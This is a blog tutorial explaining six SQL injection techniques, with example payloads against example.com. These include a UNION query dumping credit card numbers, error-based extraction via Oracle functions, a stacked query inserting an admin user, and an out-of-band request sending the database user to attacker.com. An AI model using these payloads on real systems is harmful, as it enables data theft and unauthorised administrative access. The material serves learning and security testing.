i SQL Injection Exploit Techniques – All things in moderation

SQL Injection Exploit Techniques

What is SQL injection?

SQL Injection is one of the many web attack types, an attacker can send request with malicious SQL statements then executed by database server.

A successful SQL injection exploit Attacker can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), read/write file into system, execute os commands.

Common techniques to exploit SQLi

  • Union query: can be used when the SQLi flaw happens in a SELECT statement,
  • Boolean: use to whether certain conditions are true or false.
  • Time delay: use database commands (ex. sleep) to delay answers in conditional queries.
  • Error based: Forces the database to generate an error, giving the attacker or tester information upon which to refine their injection.
  • Stacked query: using multiple query separated by “;”
  • Out-of-band: data is retrieved using different channel

SQL injection Exploit techniques

  • The first step, the tester has to make a list of all input field whose values could be used in crafting a SQL query(GET parameter, POST data, user agent, cookie header value…).

Then check it could be injected by  adding some characters like: ‘ “ ; # — /**/ AND OR @@
If it is not filtered, it is also likely to generate an error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the 
character string ''.
/target/target.asp, line 20
  • After detect SQL injection vulnerability you can using some following exploit techniques :

1. Union query

The UNION operator used in SQL query to join a query. The result of the union query will be joined to the result of the original query, allowing the tester to obtain the values of other tables.

Example:

SELECT id, name FROM Users WHERE id=$id

we will set the following $id value

SELECT id, name FROM Users WHERE id=1 UNION ALL SELECT creditCardNumber,1 FROM CreditCardTable

which will join the result of the original query with all the credit card number in CreditCardTable

To exploit UNION query, the first step you can find columns number of SELECT statement

?id=1 ORDER BY 10--

if the query fails then there must be fewer than 20 columns return by the query

Unknown column '10' in 'order clause'

If the query executes with success the tester can assume, in this example, there are 10 or more columns in the SELECT statement

2. Boolean

The boolean exploitation technique is very useful when the attacker finds a Blind SQL injection situation, in which nothing is known on the outcome of an operation. Example in MySQL we can use following functions.

SUBSTRING (string, start, length): returns a substring starting from the position “start” of string and of length “length”. If “start” is greater than the length of string, the function returns a null value.
ASCII (char): it gives back ASCII value of the input character. A null value is returned if char is 0.
LENGTH (string): it gives back the number of characters in the input string.

Through such functions, we will execute our tests on the first character and, when we have discovered the value, we will pass to the second and so on, until we will have discovered the entire value.

Example attack blind SQL injection using boolean-based: http://hydrasky.com/2016/05/17/webgoat-attack-blind-sql-injection/

3. Time delay

Similar to Boolean-based Blind, Time-based Blind also use functions : SUBSTRING, ASCII, LENGTH. and discover a character of string until the end of string. But this technique executed by measuring the time that the web application takes to answer a request. A typical approach uses the waitfor delay command in MSSQL server or BENCHMAR, SLEEP() in MySQL

4. Error-based

An Error based exploitation technique consists in forcing the database to perform some operation in which the result will be error. The point here is to try to extract some data from the database and show it in the error message. This exploitation technique can be different from DBMS to DBMS

example :

Consider following url:

http://www.example.com/index.php?id=1

the malicious request would be :

http://www.example.com/index.php?id=1||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--

In this example Oracle function UTL_INADDR.GET_HOST_NAME will try to return the host name of the parameter passed to it, which is other query, the name of the user. When the database looks for a host name with the user database name, it will fail and return an error message like:

ORA-292257: host SCOTT unknown

Then the tester can manipulate the parameter passed to GET_HOST_NAME() function and the result will be shown in the error message.

5. Stacked query

This technique use multiple query separated by “;”

Example:

Consider the following URL:

http://www.example.com/index.php?id=1

The malicious request would be:

http://www.example.com/index.php?id=1; INSERT INTO users(username, password, admin) VALUES("admin", "admn_password", 1); --

In this example, DBMS used is the MS SQL server. Attacker try to insert user with admin permission in table users.

This article shows us how to use SQL injection but basically. Each specific technique will be presented in the next post by more information.

6. Out of band

This technique is very useful when the tester find a Blind SQL Injection situation. In this technique We can receive data through another channel. This technique supported Oracle database

Example :

Consider the following URL:

http://www.example.com/index.php?id=1

The malicious request would be:

http://www.example.com/index.php?id=1||UTL_HTTP.request(‘attacker.com:80’||(SELECT user FROM DUAL)--

In this example. the function UTL_HTTP.request try to connect to attacker.com:80 and make HTTP GET request containing the retrurn from query “SELECT user FROM DUAL”

 

 

 

Leave a Reply